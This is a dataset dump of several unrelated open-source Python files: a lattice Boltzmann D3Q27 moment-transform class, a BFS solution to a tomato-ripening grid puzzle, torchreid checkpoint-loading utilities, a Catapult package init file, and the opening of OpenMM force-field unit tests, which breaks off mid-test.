[1 / 9, -2 / 9, -2 / 9, -2 / 9, -2 / 9, 1 / 9, 1 / 9, -2 / 9, -2 / 9, -2 / 9, -2 / 9, -2 / 9, -2 / 9, -2 / 9,
-2 / 9, 4 / 9, 4 / 9, 4 / 9, 4 / 9, 4 / 9, 4 / 9, 4 / 9, 4 / 9, 4 / 9, 4 / 9, 4 / 9, 4 / 9],
[0, 0, 0, 0, 0, 0, 0, -1 / 3, -1 / 3, 1 / 3, 1 / 3, 0, 0, 0, 0, 0, 0, 0, 0, 2 / 3, 2 / 3, -2 / 3, -2 / 3,
-2 / 3, -2 / 3, 2 / 3, 2 / 3],
[1 / 9, -2 / 9, -2 / 9, 1 / 9, 1 / 9, -2 / 9, -2 / 9, -2 / 9, -2 / 9, -2 / 9, -2 / 9, 4 / 9, 4 / 9, 4 / 9,
4 / 9, -2 / 9, -2 / 9, -2 / 9, -2 / 9, 4 / 9, 4 / 9, 4 / 9, 4 / 9, 4 / 9, 4 / 9, 4 / 9, 4 / 9],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1 / 3, -1 / 3, 1 / 3, 1 / 3, 0, 0, 0, 0, 2 / 3, 2 / 3, -2 / 3, -2 / 3, 2 / 3,
2 / 3, -2 / 3, -2 / 3],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1 / 3, -1 / 3, 1 / 3, 1 / 3, 2 / 3, 2 / 3, 2 / 3, 2 / 3, -2 / 3,
-2 / 3, -2 / 3, -2 / 3],
[1 / 9, 1 / 9, 1 / 9, -2 / 9, -2 / 9, -2 / 9, -2 / 9, 4 / 9, 4 / 9, 4 / 9, 4 / 9, -2 / 9, -2 / 9, -2 / 9,
-2 / 9, -2 / 9, -2 / 9, -2 / 9, -2 / 9, 4 / 9, 4 / 9, 4 / 9, 4 / 9, 4 / 9, 4 / 9, 4 / 9, 4 / 9],
[0, 0, 0, 0, 0, 1 / 9, -1 / 9, -2 / 9, 2 / 9, 2 / 9, -2 / 9, -2 / 9, 2 / 9, 2 / 9, -2 / 9, 0, 0, 0, 0, 4 / 9,
-4 / 9, -4 / 9, 4 / 9, 4 / 9, -4 / 9, -4 / 9, 4 / 9],
[0, 0, 0, 1 / 9, -1 / 9, 0, 0, -2 / 9, 2 / 9, -2 / 9, 2 / 9, 0, 0, 0, 0, -2 / 9, 2 / 9, 2 / 9, -2 / 9, 4 / 9,
-4 / 9, 4 / 9, -4 / 9, -4 / 9, 4 / 9, -4 / 9, 4 / 9],
[0, 1 / 9, -1 / 9, 0, 0, 0, 0, 0, 0, 0, 0, -2 / 9, 2 / 9, -2 / 9, 2 / 9, -2 / 9, 2 / 9, -2 / 9, 2 / 9, 4 / 9,
-4 / 9, 4 / 9, -4 / 9, 4 / 9, -4 / 9, 4 / 9, -4 / 9],
[-1 / 27, 2 / 27, 2 / 27, 2 / 27, 2 / 27, 2 / 27, 2 / 27, -4 / 27, -4 / 27, -4 / 27, -4 / 27, -4 / 27, -4 / 27,
-4 / 27, -4 / 27, -4 / 27, -4 / 27, -4 / 27, -4 / 27, 8 / 27, 8 / 27, 8 / 27, 8 / 27, 8 / 27, 8 / 27, 8 / 27,
8 / 27],
])
inverse = np.array([
[8 / 27, 0, 0, 0, -4 / 9, 0, 0, -4 / 9, 0, -4 / 9, 0, 0, 0, 0, 0, 0, 0, 2 / 3, 0, 2 / 3, 0, 0, 2 / 3, 0, 0, 0,
-1],
[2 / 27, 2 / 9, 0, 0, 2 / 9, 0, 0, -1 / 9, 0, -1 / 9, 0, 0, -1 / 3, 0, -1 / 3, 0, 0, -1 / 3, 0, -1 / 3, 0, 0,
1 / 6, 0, 0, 1 / 2, 1 / 2],
[2 / 27, -2 / 9, 0, 0, 2 / 9, 0, 0, -1 / 9, 0, -1 / 9, 0, 0, 1 / 3, 0, 1 / 3, 0, 0, -1 / 3, 0, -1 / 3, 0, 0,
1 / 6, 0, 0, -1 / 2, 1 / 2],
[2 / 27, 0, 2 / 9, 0, -1 / 9, 0, 0, 2 / 9, 0, -1 / 9, -1 / 3, 0, 0, 0, 0, 0, -1 / 3, -1 / 3, 0, 1 / 6, 0, 0,
-1 / 3, 0, 1 / 2, 0, 1 / 2],
[2 / 27, 0, -2 / 9, 0, -1 / 9, 0, 0, 2 / 9, 0, -1 / 9, 1 / 3, 0, 0, 0, 0, 0, 1 / 3, -1 / 3, 0, 1 / 6, 0, 0,
-1 / 3, 0, -1 / 2, 0, 1 / 2],
[2 / 27, 0, 0, 2 / 9, -1 / 9, 0, 0, -1 / 9, 0, 2 / 9, 0, -1 / 3, 0, 0, 0, -1 / 3, 0, 1 / 6, 0, -1 / 3, 0, 0,
-1 / 3, 1 / 2, 0, 0, 1 / 2],
[2 / 27, 0, 0, -2 / 9, -1 / 9, 0, 0, -1 / 9, 0, 2 / 9, 0, 1 / 3, 0, 0, 0, 1 / 3, 0, 1 / 6, 0, -1 / 3, 0, 0,
-1 / 3, -1 / 2, 0, 0, 1 / 2],
[1 / 54, 0, 1 / 18, 1 / 18, -1 / 36, 0, 0, 1 / 18, 1 / 6, 1 / 18, -1 / 12, -1 / 12, 0, 0, 0, 1 / 6, 1 / 6,
-1 / 12, -1 / 4, -1 / 12, 0, 0, 1 / 6, -1 / 4, -1 / 4, 0, -1 / 4],
[1 / 54, 0, -1 / 18, -1 / 18, -1 / 36, 0, 0, 1 / 18, 1 / 6, 1 / 18, 1 / 12, 1 / 12, 0, 0, 0, -1 / 6, -1 / 6,
-1 / 12, -1 / 4, -1 / 12, 0, 0, 1 / 6, 1 / 4, 1 / 4, 0, -1 / 4],
[1 / 54, 0, 1 / 18, -1 / 18, -1 / 36, 0, 0, 1 / 18, -1 / 6, 1 / 18, -1 / 12, 1 / 12, 0, 0, 0, -1 / 6, 1 / 6,
-1 / 12, 1 / 4, -1 / 12, 0, 0, 1 / 6, 1 / 4, -1 / 4, 0, -1 / 4],
[1 / 54, 0, -1 / 18, 1 / 18, -1 / 36, 0, 0, 1 / 18, -1 / 6, 1 / 18, 1 / 12, -1 / 12, 0, 0, 0, 1 / 6, -1 / 6,
-1 / 12, 1 / 4, -1 / 12, 0, 0, 1 / 6, -1 / 4, 1 / 4, 0, -1 / 4],
[1 / 54, 1 / 18, 0, 1 / 18, 1 / 18, 0, 1 / 6, -1 / 36, 0, 1 / 18, 0, 1 / 6, -1 / 12, 0, 1 / 6, -1 / 12, 0,
-1 / 12, 0, 1 / 6, -1 / 4, 0, -1 / 12, -1 / 4, 0, -1 / 4, -1 / 4],
[1 / 54, -1 / 18, 0, -1 / 18, 1 / 18, 0, 1 / 6, -1 / 36, 0, 1 / 18, 0, -1 / 6, 1 / 12, 0, -1 / 6, 1 / 12, 0,
-1 / 12, 0, 1 / 6, -1 / 4, 0, -1 / 12, 1 / 4, 0, 1 / 4, -1 / 4],
[1 / 54, 1 / 18, 0, -1 / 18, 1 / 18, 0, -1 / 6, -1 / 36, 0, 1 / 18, 0, -1 / 6, -1 / 12, 0, 1 / 6, 1 / 12, 0,
-1 / 12, 0, 1 / 6, 1 / 4, 0, -1 / 12, 1 / 4, 0, -1 / 4, -1 / 4],
[1 / 54, -1 / 18, 0, 1 / 18, 1 / 18, 0, -1 / 6, -1 / 36, 0, 1 / 18, 0, 1 / 6, 1 / 12, 0, -1 / 6, -1 / 12, 0,
-1 / 12, 0, 1 / 6, 1 / 4, 0, -1 / 12, -1 / 4, 0, 1 / 4, -1 / 4],
[1 / 54, 1 / 18, 1 / 18, 0, 1 / 18, 1 / 6, 0, 1 / 18, 0, -1 / 36, 1 / 6, 0, 1 / 6, 0, -1 / 12, 0, -1 / 12,
1 / 6, 0, -1 / 12, 0, -1 / 4, -1 / 12, 0, -1 / 4, -1 / 4, -1 / 4],
[1 / 54, -1 / 18, -1 / 18, 0, 1 / 18, 1 / 6, 0, 1 / 18, 0, -1 / 36, -1 / 6, 0, -1 / 6, 0, 1 / 12, 0, 1 / 12,
1 / 6, 0, -1 / 12, 0, -1 / 4, -1 / 12, 0, 1 / 4, 1 / 4, -1 / 4],
[1 / 54, 1 / 18, -1 / 18, 0, 1 / 18, -1 / 6, 0, 1 / 18, 0, -1 / 36, -1 / 6, 0, 1 / 6, 0, -1 / 12, 0, 1 / 12,
1 / 6, 0, -1 / 12, 0, 1 / 4, -1 / 12, 0, 1 / 4, -1 / 4, -1 / 4],
[1 / 54, -1 / 18, 1 / 18, 0, 1 / 18, -1 / 6, 0, 1 / 18, 0, -1 / 36, 1 / 6, 0, -1 / 6, 0, 1 / 12, 0, -1 / 12,
1 / 6, 0, -1 / 12, 0, 1 / 4, -1 / 12, 0, -1 / 4, 1 / 4, -1 / 4],
[1 / 216, 1 / 72, 1 / 72, 1 / 72, 1 / 72, 1 / 24, 1 / 24, 1 / 72, 1 / 24, 1 / 72, 1 / 24, 1 / 24, 1 / 24, 1 / 8,
1 / 24, 1 / 24, 1 / 24, 1 / 24, 1 / 8, 1 / 24, 1 / 8, 1 / 8, 1 / 24, 1 / 8, 1 / 8, 1 / 8, 1 / 8],
[1 / 216, -1 / 72, -1 / 72, -1 / 72, 1 / 72, 1 / 24, 1 / 24, 1 / 72, 1 / 24, 1 / 72, -1 / 24, -1 / 24, -1 / 24,
-1 / 8, -1 / 24, -1 / 24, -1 / 24, 1 / 24, 1 / 8, 1 / 24, 1 / 8, 1 / 8, 1 / 24, -1 / 8, -1 / 8, -1 / 8, 1 / 8],
[1 / 216, 1 / 72, 1 / 72, -1 / 72, 1 / 72, 1 / 24, -1 / 24, 1 / 72, -1 / 24, 1 / 72, 1 / 24, -1 / 24, 1 / 24,
-1 / 8, 1 / 24, -1 / 24, 1 / 24, 1 / 24, -1 / 8, 1 / 24, -1 / 8, 1 / 8, 1 / 24, -1 / 8, 1 / 8, 1 / 8, 1 / 8],
[1 / 216, -1 / 72, -1 / 72, 1 / 72, 1 / 72, 1 / 24, -1 / 24, 1 / 72, -1 / 24, 1 / 72, -1 / 24, 1 / 24, -1 / 24,
1 / 8, -1 / 24, 1 / 24, -1 / 24, 1 / 24, -1 / 8, 1 / 24, -1 / 8, 1 / 8, 1 / 24, 1 / 8, -1 / 8, -1 / 8, 1 / 8],
[1 / 216, 1 / 72, -1 / 72, 1 / 72, 1 / 72, -1 / 24, 1 / 24, 1 / 72, -1 / 24, 1 / 72, -1 / 24, 1 / 24, 1 / 24,
-1 / 8, 1 / 24, 1 / 24, -1 / 24, 1 / 24, -1 / 8, 1 / 24, 1 / 8, -1 / 8, 1 / 24, 1 / 8, -1 / 8, 1 / 8, 1 / 8],
[1 / 216, -1 / 72, 1 / 72, -1 / 72, 1 / 72, -1 / 24, 1 / 24, 1 / 72, -1 / 24, 1 / 72, 1 / 24, -1 / 24, -1 / 24,
1 / 8, -1 / 24, -1 / 24, 1 / 24, 1 / 24, -1 / 8, 1 / 24, 1 / 8, -1 / 8, 1 / 24, -1 / 8, 1 / 8, -1 / 8, 1 / 8],
[1 / 216, 1 / 72, -1 / 72, -1 / 72, 1 / 72, -1 / 24, -1 / 24, 1 / 72, 1 / 24, 1 / 72, -1 / 24, -1 / 24, 1 / 24,
1 / 8, 1 / 24, -1 / 24, -1 / 24, 1 / 24, 1 / 8, 1 / 24, -1 / 8, -1 / 8, 1 / 24, -1 / 8, -1 / 8, 1 / 8, 1 / 8],
[1 / 216, -1 / 72, 1 / 72, 1 / 72, 1 / 72, -1 / 24, -1 / 24, 1 / 72, 1 / 24, 1 / 72, 1 / 24, 1 / 24, -1 / 24,
-1 / 8, -1 / 24, 1 / 24, 1 / 24, 1 / 24, 1 / 8, 1 / 24, -1 / 8, -1 / 8, 1 / 24, 1 / 8, 1 / 8, -1 / 8, 1 / 8],
])
names = ['rho', 'jx', 'jy', 'jz', 'Pi_xx', 'Pi_xy', 'PI_xz', 'PI_yy', 'PI_yz', 'PI_zz',
'J_xxy', 'J_xxz', 'J_xyy', 'J_xyz', 'J_xzz', 'J_yyz', 'J_yzz',
'J_xxyy', 'J_xxyz', 'J_xxzz', 'J_xyyz', 'J_xyzz', 'J_yyzz',
'J_xxyyz', 'J_xxyzz', 'J_xyyzz', 'J_xyxzyz']
supported_stencils = [D3Q27]
def __init__(self, lattice):
super(D3Q27Hermite, self).__init__(
lattice, self.names
)
self.matrix = self.lattice.convert_to_tensor(self.matrix)
self.inverse = self.lattice.convert_to_tensor(self.inverse)
def transform(self, f):
return self.lattice.mv(self.matrix, f)
def inverse_transform(self, m):
return self.lattice.mv(self.inverse, m)
def equilibrium(self, m):
meq = torch.zeros_like(m)
rho = m[0]
jx = m[1]
jy = m[2]
jz = m[3]
meq[0] = rho
meq[1] = jx
meq[2] = jy
meq[3] = jz
meq[4] = jx * jx / rho
meq[5] = jx * jy / rho
meq[6] = jx * jz / rho
meq[7] = jy * jy / rho
meq[8] = jy * jz / rho
meq[9] = jz * jz / rho
meq[10] = jx * jx * jy / rho ** 2
meq[11] = jx * jx * jz / rho ** 2
meq[12] = jx * jy * jy / rho ** 2
meq[13] = jx * jy * jz / rho ** 2
meq[14] = jx * jz * jz / rho ** 2
meq[15] = jy * jy * jz / rho ** 2
meq[16] = jy * jz * jz / rho ** 2
meq[17] = jx * jx * jy * jy / rho ** 3
meq[18] = jx * jx * jy * jz / rho ** 3
meq[19] = jx * jx * jz * jz / rho ** 3
meq[20] = jx * jy * jy * jz / rho ** 3
meq[21] = jx * jy * jz * jz / rho ** 3
meq[22] = jy * jy * jz * jz / rho ** 3
meq[23] = jx * jx * jy * jy * jz / rho ** 4
meq[24] = jx * jx * jy * jz * jz / rho ** 4
meq[25] = jx * jy * jy * jz * jz / rho ** 4
meq[26] = jx * jy * jx * jz * jy * jz / rho ** 5
return meq
|
ead31affaf18b24f0016272388abef419c8f50c0
|
307d3837d31f9e3728af2b62ca51ebf63fe6ec6b
|
/hall_of_fame/lysuk96/DFS_BFS/BOJ_7576.py
|
b858dd8a152cdaeca052087962a1a1ff50ab1ced
|
[] |
no_license
|
ellynhan/challenge100-codingtest-study
|
905043497d154b8a7333ca536e536d013f6e7454
|
bcdc6d04f13b12ba80b42e066f9d244d7c2cc698
|
refs/heads/master
| 2023-09-01T14:10:13.481013
| 2023-08-27T14:38:52
| 2023-08-27T14:38:52
| 401,561,230
| 162
| 176
| null | 2023-09-09T14:56:25
| 2021-08-31T03:30:36
|
C++
|
UTF-8
|
Python
| false
| false
| 1,315
|
py
|
BOJ_7576.py
|
#토마토
#count 출력 : len(queue) 반복 후
from collections import deque
def solution(m, n, tomatoes):
def search(r, c):
D = [(0,1), (0,-1), (1,0), (-1,0)]
result = []
for i, j in D:
if (r+i>=0 and r+i<n)\
and (c+j>=0 and c+j<m)\
and (tomatoes[r+i][c+j] == 0):
result.append((r+i, c+j))
return result
#initialize
queue = deque([])
count = 0
for r in range(n):
for c in range(m):
if tomatoes[r][c] == 1:
queue.append((r,c))
while queue:
# print(queue)
for _ in range(len(queue)):
tomato = queue.popleft()
for i, j in search(tomato[0],tomato[1]):
tomatoes[i][j] = 1
queue.append((i,j))
# print(tomatoes)
count+=1
#결과물 출력
for r in range(n):
for c in range(m):
if tomatoes[r][c] == 0:
print('-1')
return
print(count-1)
return
M, N = map(int, input().split())
# tomatoes = []
# for r in range(M):
# for c in range(N):
# tomatoes[r][c] = int(input())
tomatoes = [[n for n in map(int,input().split())] for _ in range(N)]
# print(tomatoes)
solution(M, N, tomatoes)
|
707b07216a428a5957d2a20fabec775b093de7a0
|
18ad3a6818cd9d8243e2fe41d65bc76530e6dbae
|
/torchreid/utils/torchtools.py
|
e854278d90106e64c0f0822b2fa699da05221f7c
|
[
"MIT"
] |
permissive
|
KaiyangZhou/deep-person-reid
|
55fe2fa0306847c5447d1c70fecd1f585758ae5e
|
566a56a2cb255f59ba75aa817032621784df546a
|
refs/heads/master
| 2023-09-02T21:55:37.749729
| 2023-02-08T02:52:17
| 2023-02-08T02:52:17
| 124,800,162
| 4,191
| 1,167
|
MIT
| 2023-05-23T11:41:21
| 2018-03-11T21:14:39
|
Python
|
UTF-8
|
Python
| false
| false
| 9,672
|
py
|
torchtools.py
|
from __future__ import division, print_function, absolute_import
import pickle
import shutil
import os.path as osp
import warnings
from functools import partial
from collections import OrderedDict
import torch
import torch.nn as nn
from .tools import mkdir_if_missing
__all__ = [
'save_checkpoint', 'load_checkpoint', 'resume_from_checkpoint',
'open_all_layers', 'open_specified_layers', 'count_num_param',
'load_pretrained_weights'
]
def save_checkpoint(
state, save_dir, is_best=False, remove_module_from_keys=False
):
r"""Saves checkpoint.
Args:
state (dict): dictionary.
save_dir (str): directory to save checkpoint.
is_best (bool, optional): if True, this checkpoint will be copied and named
``model-best.pth.tar``. Default is False.
remove_module_from_keys (bool, optional): whether to remove "module."
from layer names. Default is False.
Examples::
>>> state = {
>>> 'state_dict': model.state_dict(),
>>> 'epoch': 10,
>>> 'rank1': 0.5,
>>> 'optimizer': optimizer.state_dict()
>>> }
>>> save_checkpoint(state, 'log/my_model')
"""
mkdir_if_missing(save_dir)
if remove_module_from_keys:
# remove 'module.' in state_dict's keys
state_dict = state['state_dict']
new_state_dict = OrderedDict()
for k, v in state_dict.items():
if k.startswith('module.'):
k = k[7:]
new_state_dict[k] = v
state['state_dict'] = new_state_dict
# save
epoch = state['epoch']
fpath = osp.join(save_dir, 'model.pth.tar-' + str(epoch))
torch.save(state, fpath)
print('Checkpoint saved to "{}"'.format(fpath))
if is_best:
shutil.copy(fpath, osp.join(osp.dirname(fpath), 'model-best.pth.tar'))
def load_checkpoint(fpath):
r"""Loads checkpoint.
``UnicodeDecodeError`` can be well handled, which means
python2-saved files can be read from python3.
Args:
fpath (str): path to checkpoint.
Returns:
dict
Examples::
>>> from torchreid.utils import load_checkpoint
>>> fpath = 'log/my_model/model.pth.tar-10'
>>> checkpoint = load_checkpoint(fpath)
"""
if fpath is None:
raise ValueError('File path is None')
fpath = osp.abspath(osp.expanduser(fpath))
if not osp.exists(fpath):
raise FileNotFoundError('File is not found at "{}"'.format(fpath))
map_location = None if torch.cuda.is_available() else 'cpu'
try:
checkpoint = torch.load(fpath, map_location=map_location)
except UnicodeDecodeError:
pickle.load = partial(pickle.load, encoding="latin1")
pickle.Unpickler = partial(pickle.Unpickler, encoding="latin1")
checkpoint = torch.load(
fpath, pickle_module=pickle, map_location=map_location
)
except Exception:
print('Unable to load checkpoint from "{}"'.format(fpath))
raise
return checkpoint
def resume_from_checkpoint(fpath, model, optimizer=None, scheduler=None):
r"""Resumes training from a checkpoint.
This will load (1) model weights and (2) ``state_dict``
of optimizer if ``optimizer`` is not None.
Args:
fpath (str): path to checkpoint.
model (nn.Module): model.
optimizer (Optimizer, optional): an Optimizer.
scheduler (LRScheduler, optional): an LRScheduler.
Returns:
int: start_epoch.
Examples::
>>> from torchreid.utils import resume_from_checkpoint
>>> fpath = 'log/my_model/model.pth.tar-10'
>>> start_epoch = resume_from_checkpoint(
>>> fpath, model, optimizer, scheduler
>>> )
"""
print('Loading checkpoint from "{}"'.format(fpath))
checkpoint = load_checkpoint(fpath)
model.load_state_dict(checkpoint['state_dict'])
print('Loaded model weights')
if optimizer is not None and 'optimizer' in checkpoint.keys():
optimizer.load_state_dict(checkpoint['optimizer'])
print('Loaded optimizer')
if scheduler is not None and 'scheduler' in checkpoint.keys():
scheduler.load_state_dict(checkpoint['scheduler'])
print('Loaded scheduler')
start_epoch = checkpoint['epoch']
print('Last epoch = {}'.format(start_epoch))
if 'rank1' in checkpoint.keys():
print('Last rank1 = {:.1%}'.format(checkpoint['rank1']))
return start_epoch
def adjust_learning_rate(
optimizer,
base_lr,
epoch,
stepsize=20,
gamma=0.1,
linear_decay=False,
final_lr=0,
max_epoch=100
):
r"""Adjusts learning rate.
Deprecated.
"""
if linear_decay:
# linearly decay learning rate from base_lr to final_lr
frac_done = epoch / max_epoch
lr = frac_done*final_lr + (1.-frac_done) * base_lr
else:
# decay learning rate by gamma for every stepsize
lr = base_lr * (gamma**(epoch // stepsize))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
def set_bn_to_eval(m):
r"""Sets BatchNorm layers to eval mode."""
# 1. no update for running mean and var
# 2. scale and shift parameters are still trainable
classname = m.__class__.__name__
if classname.find('BatchNorm') != -1:
m.eval()
def open_all_layers(model):
r"""Opens all layers in model for training.
Examples::
>>> from torchreid.utils import open_all_layers
>>> open_all_layers(model)
"""
model.train()
for p in model.parameters():
p.requires_grad = True
def open_specified_layers(model, open_layers):
r"""Opens specified layers in model for training while keeping
other layers frozen.
Args:
model (nn.Module): neural net model.
open_layers (str or list): layers open for training.
Examples::
>>> from torchreid.utils import open_specified_layers
>>> # Only model.classifier will be updated.
>>> open_layers = 'classifier'
>>> open_specified_layers(model, open_layers)
>>> # Only model.fc and model.classifier will be updated.
>>> open_layers = ['fc', 'classifier']
>>> open_specified_layers(model, open_layers)
"""
if isinstance(model, nn.DataParallel):
model = model.module
if isinstance(open_layers, str):
open_layers = [open_layers]
for layer in open_layers:
assert hasattr(
model, layer
), '"{}" is not an attribute of the model, please provide the correct name'.format(
layer
)
for name, module in model.named_children():
if name in open_layers:
module.train()
for p in module.parameters():
p.requires_grad = True
else:
module.eval()
for p in module.parameters():
p.requires_grad = False
def count_num_param(model):
r"""Counts number of parameters in a model while ignoring ``self.classifier``.
Args:
model (nn.Module): network model.
Examples::
>>> from torchreid.utils import count_num_param
>>> model_size = count_num_param(model)
.. warning::
This method is deprecated in favor of
``torchreid.utils.compute_model_complexity``.
"""
warnings.warn(
'This method is deprecated and will be removed in the future.'
)
num_param = sum(p.numel() for p in model.parameters())
if isinstance(model, nn.DataParallel):
model = model.module
if hasattr(model,
'classifier') and isinstance(model.classifier, nn.Module):
# we ignore the classifier because it is unused at test time
num_param -= sum(p.numel() for p in model.classifier.parameters())
return num_param
def load_pretrained_weights(model, weight_path):
r"""Loads pretrianed weights to model.
Features::
- Incompatible layers (unmatched in name or size) will be ignored.
- Can automatically deal with keys containing "module.".
Args:
model (nn.Module): network model.
weight_path (str): path to pretrained weights.
Examples::
>>> from torchreid.utils import load_pretrained_weights
>>> weight_path = 'log/my_model/model-best.pth.tar'
>>> load_pretrained_weights(model, weight_path)
"""
checkpoint = load_checkpoint(weight_path)
if 'state_dict' in checkpoint:
state_dict = checkpoint['state_dict']
else:
state_dict = checkpoint
model_dict = model.state_dict()
new_state_dict = OrderedDict()
matched_layers, discarded_layers = [], []
for k, v in state_dict.items():
if k.startswith('module.'):
k = k[7:] # discard module.
if k in model_dict and model_dict[k].size() == v.size():
new_state_dict[k] = v
matched_layers.append(k)
else:
discarded_layers.append(k)
model_dict.update(new_state_dict)
model.load_state_dict(model_dict)
if len(matched_layers) == 0:
warnings.warn(
'The pretrained weights "{}" cannot be loaded, '
'please check the key names manually '
'(** ignored and continue **)'.format(weight_path)
)
else:
print(
'Successfully loaded pretrained weights from "{}"'.
format(weight_path)
)
if len(discarded_layers) > 0:
print(
'** The following layers are discarded '
'due to unmatched keys or layer size: {}'.
format(discarded_layers)
)
|
82723093b606011e8cfc3c82e028136cda437c99
|
3a6a211ea0d32405497fbd6486c490bb147e25f9
|
/dashboard/dashboard/models/__init__.py
|
64d74087cb12ebb5a4ceb9a2d564bae931868a4f
|
[
"BSD-3-Clause"
] |
permissive
|
catapult-project/catapult
|
e2cbdd5eb89f3b1492fc8752494e62ea1df4bae0
|
53102de187a48ac2cfc241fef54dcbc29c453a8e
|
refs/heads/main
| 2021-05-25T07:37:22.832505
| 2021-05-24T08:01:49
| 2021-05-25T06:07:38
| 33,947,548
| 2,032
| 742
|
BSD-3-Clause
| 2022-08-26T16:01:18
| 2015-04-14T17:49:05
|
HTML
|
UTF-8
|
Python
| false
| false
| 341
|
py
|
__init__.py
|
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""The models sub-package, which contains datastore model classes."""
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
|
4839bf1a05887f8a1db746696637535d8d88936d
|
add160f872dccc7f326dc00196fd418c748a89b1
|
/wrappers/python/tests/TestForceField.py
|
767c7793d642248cfe50f2385452cdb4a3ed1c1e
|
[] |
no_license
|
openmm/openmm
|
22f3d6ae2747f54acfaa92a5a6a5869049019dee
|
d2593f386a627d069b5ec17a3a2f4ecd40d85dd1
|
refs/heads/master
| 2023-08-22T18:29:54.807240
| 2023-08-18T19:09:05
| 2023-08-18T19:09:05
| 10,178,188
| 875
| 324
| null | 2023-09-12T23:40:17
| 2013-05-20T17:42:52
|
C++
|
UTF-8
|
Python
| false
| false
| 69,170
|
py
|
TestForceField.py
|
import unittest
from validateConstraints import *
from openmm.app import *
from openmm import *
from openmm.unit import *
import openmm.app.element as elem
import openmm.app.forcefield as forcefield
import math
import textwrap
try:
from cStringIO import StringIO
except ImportError:
from io import StringIO
import os
import warnings
class TestForceField(unittest.TestCase):
"""Test the ForceField.createSystem() method."""
def setUp(self):
"""Set up the tests by loading the input pdb files and force field
xml files.
"""
# alanine dipeptide with explicit water
self.pdb1 = PDBFile('systems/alanine-dipeptide-explicit.pdb')
self.forcefield1 = ForceField('amber99sb.xml', 'tip3p.xml')
self.topology1 = self.pdb1.topology
self.topology1.setUnitCellDimensions(Vec3(2, 2, 2))
# alanine dipeptide with implicit water
self.pdb2 = PDBFile('systems/alanine-dipeptide-implicit.pdb')
self.forcefield2 = ForceField('amber99sb.xml', 'amber99_obc.xml')
def test_NonbondedMethod(self):
"""Test all six options for the nonbondedMethod parameter."""
methodMap = {NoCutoff:NonbondedForce.NoCutoff,
CutoffNonPeriodic:NonbondedForce.CutoffNonPeriodic,
CutoffPeriodic:NonbondedForce.CutoffPeriodic,
Ewald:NonbondedForce.Ewald,
PME:NonbondedForce.PME,
LJPME:NonbondedForce.LJPME}
for method in methodMap:
system = self.forcefield1.createSystem(self.pdb1.topology,
nonbondedMethod=method)
forces = system.getForces()
self.assertTrue(any(isinstance(f, NonbondedForce) and
f.getNonbondedMethod()==methodMap[method]
for f in forces))
def test_DispersionCorrection(self):
"""Test to make sure that the dispersion/long-range correction is set properly."""
top = Topology()
chain = top.addChain()
for lrc in (True, False):
xml = textwrap.dedent(
"""
<ForceField>
<LennardJonesForce lj14scale="0.3" useDispersionCorrection="{lrc}">
<Atom type="A" sigma="1" epsilon="0.1"/>
<Atom type="B" sigma="2" epsilon="0.2"/>
<NBFixPair type1="A" type2="B" sigma="2.5" epsilon="1.1"/>
</LennardJonesForce>
<NonbondedForce coulomb14scale="0.833333" lj14scale="0.5" useDispersionCorrection="{lrc2}">
<Atom type="A" sigma="0.315" epsilon="0.635"/>
</NonbondedForce>
</ForceField>
"""
)
ff = ForceField(StringIO(xml.format(lrc=lrc, lrc2=lrc)))
system = ff.createSystem(top)
checked_nonbonded = False
checked_custom = False
for force in system.getForces():
if isinstance(force, NonbondedForce):
self.assertEqual(force.getUseDispersionCorrection(), lrc)
checked_nonbonded = True
elif isinstance(force, CustomNonbondedForce):
self.assertEqual(force.getUseLongRangeCorrection(), lrc)
checked_custom = True
self.assertTrue(checked_nonbonded and checked_custom)
# check that the keyword argument overwrites xml input
lrc_kwarg = not lrc
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
system2 = ff.createSystem(top, useDispersionCorrection=lrc_kwarg)
self.assertTrue(len(w) == 2)
assert "conflict" in str(w[-1].message).lower()
checked_nonbonded = False
checked_custom = False
for force in system2.getForces():
if isinstance(force, NonbondedForce):
self.assertEqual(force.getUseDispersionCorrection(), lrc_kwarg)
checked_nonbonded = True
elif isinstance(force, CustomNonbondedForce):
self.assertEqual(force.getUseLongRangeCorrection(), lrc_kwarg)
checked_custom = True
self.assertTrue(checked_nonbonded and checked_custom)
# check that no warning is generated when useDispersionCorrection is not in the xml file
xml = textwrap.dedent(
"""
<ForceField>
<LennardJonesForce lj14scale="0.3">
<Atom type="A" sigma="1" epsilon="0.1"/>
<Atom type="B" sigma="2" epsilon="0.2"/>
<NBFixPair type1="A" type2="B" sigma="2.5" epsilon="1.1"/>
</LennardJonesForce>
<NonbondedForce coulomb14scale="0.833333" lj14scale="0.5">
<Atom type="A" sigma="0.315" epsilon="0.635"/>
</NonbondedForce>
</ForceField>
"""
)
ff = ForceField(StringIO(xml))
system = ff.createSystem(top)
for lrc_kwarg in [True, False]:
with warnings.catch_warnings():
warnings.simplefilter("error")
system2 = ff.createSystem(top, useDispersionCorrection=lrc_kwarg)
def test_Cutoff(self):
"""Test to make sure the nonbondedCutoff parameter is passed correctly."""
for method in [CutoffNonPeriodic, CutoffPeriodic, Ewald, PME, LJPME]:
system = self.forcefield1.createSystem(self.pdb1.topology,
nonbondedMethod=method,
nonbondedCutoff=2*nanometer,
constraints=HBonds)
cutoff_distance = 0.0*nanometer
cutoff_check = 2.0*nanometer
for force in system.getForces():
if isinstance(force, NonbondedForce):
cutoff_distance = force.getCutoffDistance()
self.assertEqual(cutoff_distance, cutoff_check)
def test_SwitchingDistance(self):
"""Test that the switchDistance parameter is processed correctly."""
for switchDistance in [None, 0.9*nanometers]:
system = self.forcefield1.createSystem(self.pdb1.topology,
nonbondedMethod=PME,
switchDistance=switchDistance)
for force in system.getForces():
if isinstance(force, NonbondedForce):
if switchDistance is None:
self.assertFalse(force.getUseSwitchingFunction())
else:
self.assertTrue(force.getUseSwitchingFunction())
self.assertEqual(switchDistance, force.getSwitchingDistance())
def test_RemoveCMMotion(self):
"""Test both options (True and False) for the removeCMMotion parameter."""
for b in [True, False]:
system = self.forcefield1.createSystem(self.pdb1.topology,removeCMMotion=b)
forces = system.getForces()
self.assertEqual(any(isinstance(f, CMMotionRemover) for f in forces), b)
def test_RigidWaterAndConstraints(self):
"""Test all eight options for the constraints and rigidWater parameters."""
